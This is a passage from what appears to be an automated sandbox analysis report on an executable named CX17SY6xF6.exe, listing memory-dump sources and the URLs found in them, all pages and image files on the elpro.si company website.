                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/ex/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/kalibracija/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/monitoring/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/nivo/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/prenosno/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/regulacija/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/temperatura/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/tlak/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/vlaga/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/predstavitev-novega-partnerja-batemika/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/privacy-policy/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/temperaturno-tipalo-z-zascitno-cevjo/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-admin/admin-ajax.php
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/Elpro_E-64x64.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/Elpro_E.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Analiza-plinov.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Kalibracija.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Nivo.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Regulacija.svg
